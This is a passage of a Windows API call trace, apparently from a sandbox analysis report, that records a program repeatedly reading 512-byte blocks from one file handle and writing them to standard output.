lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.819] GetFileType (hFile=0x50) returned 0x1 [0225.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.819] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.819] GetFileType (hFile=0x50) returned 0x1 [0225.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.819] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.819] GetFileType (hFile=0x50) returned 0x1 [0225.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.820] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.820] GetFileType (hFile=0x50) returned 0x1 [0225.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.820] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.820] GetFileType (hFile=0x50) returned 0x1 [0225.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.820] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.820] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.820] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.820] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.820] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.820] GetFileType (hFile=0x50) returned 0x1 [0225.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.820] GetFileType (hFile=0x50) returned 0x1 [0225.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.820] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.821] GetFileType (hFile=0x50) returned 0x1 [0225.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.821] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.821] GetFileType (hFile=0x50) returned 0x1 [0225.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.821] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.821] GetFileType (hFile=0x50) returned 0x1 [0225.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.821] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.821] GetFileType (hFile=0x50) returned 0x1 [0225.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.821] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.821] GetFileType (hFile=0x50) returned 0x1 [0225.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.821] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.821] GetFileType (hFile=0x50) returned 0x1 [0225.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.822] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.822] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.822] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.822] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.822] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.822] GetFileType (hFile=0x50) returned 0x1 [0225.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.822] GetFileType (hFile=0x50) returned 0x1 [0225.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.822] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.822] GetFileType (hFile=0x50) returned 0x1 [0225.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.822] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.822] GetFileType (hFile=0x50) returned 0x1 [0225.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.822] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.822] GetFileType (hFile=0x50) returned 0x1 [0225.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.823] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.823] GetFileType (hFile=0x50) returned 0x1 [0225.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.823] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.823] GetFileType (hFile=0x50) returned 0x1 [0225.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.823] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.823] GetFileType (hFile=0x50) returned 0x1 [0225.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.823] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.823] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.823] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.823] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.823] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.823] GetFileType (hFile=0x50) returned 0x1 [0225.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.823] GetFileType (hFile=0x50) returned 0x1 [0225.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.824] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.824] GetFileType (hFile=0x50) returned 0x1 [0225.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.824] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.824] GetFileType (hFile=0x50) returned 0x1 [0225.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.824] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.824] GetFileType (hFile=0x50) returned 0x1 [0225.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.919] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.919] GetFileType (hFile=0x50) returned 0x1 [0225.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.919] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.919] GetFileType (hFile=0x50) returned 0x1 [0225.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.919] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.920] GetFileType (hFile=0x50) returned 0x1 [0225.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.920] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.920] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.920] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.920] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.920] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.920] GetFileType (hFile=0x50) returned 0x1 [0225.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.920] GetFileType (hFile=0x50) returned 0x1 [0225.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.920] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.920] GetFileType (hFile=0x50) returned 0x1 [0225.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.920] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.920] GetFileType (hFile=0x50) returned 0x1 [0225.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.920] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.920] GetFileType (hFile=0x50) returned 0x1 [0225.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.921] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.921] GetFileType (hFile=0x50) returned 0x1 [0225.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.921] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.921] GetFileType (hFile=0x50) returned 0x1 [0225.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.921] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.921] GetFileType (hFile=0x50) returned 0x1 [0225.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.921] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.921] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.921] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.921] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.921] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.921] GetFileType (hFile=0x50) returned 0x1 [0225.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.921] GetFileType (hFile=0x50) returned 0x1 [0225.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.922] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.922] GetFileType (hFile=0x50) returned 0x1 [0225.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.922] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.922] GetFileType (hFile=0x50) returned 0x1 [0225.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.922] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.922] GetFileType (hFile=0x50) returned 0x1 [0225.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.922] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.922] GetFileType (hFile=0x50) returned 0x1 [0225.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.922] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.922] GetFileType (hFile=0x50) returned 0x1 [0225.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.923] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.923] GetFileType (hFile=0x50) returned 0x1 [0225.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.923] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.923] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.923] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.923] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.923] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.923] GetFileType (hFile=0x50) returned 0x1 [0225.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.923] GetFileType (hFile=0x50) returned 0x1 [0225.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.923] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.923] GetFileType (hFile=0x50) returned 0x1 [0225.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.923] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.923] GetFileType (hFile=0x50) returned 0x1 [0225.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.924] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.924] GetFileType (hFile=0x50) returned 0x1 [0225.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.924] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.924] GetFileType (hFile=0x50) returned 0x1 [0225.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.924] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.924] GetFileType (hFile=0x50) returned 0x1 [0225.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.924] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.924] GetFileType (hFile=0x50) returned 0x1 [0225.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.924] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.924] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.924] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.925] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.925] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.925] GetFileType (hFile=0x50) returned 0x1 [0225.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.925] GetFileType (hFile=0x50) returned 0x1 [0225.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.925] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.925] GetFileType (hFile=0x50) returned 0x1 [0225.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.925] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.925] GetFileType (hFile=0x50) returned 0x1 [0225.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.925] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.925] GetFileType (hFile=0x50) returned 0x1 [0225.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.925] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.925] GetFileType (hFile=0x50) returned 0x1 [0225.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.926] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.926] GetFileType (hFile=0x50) returned 0x1 [0225.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.926] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, 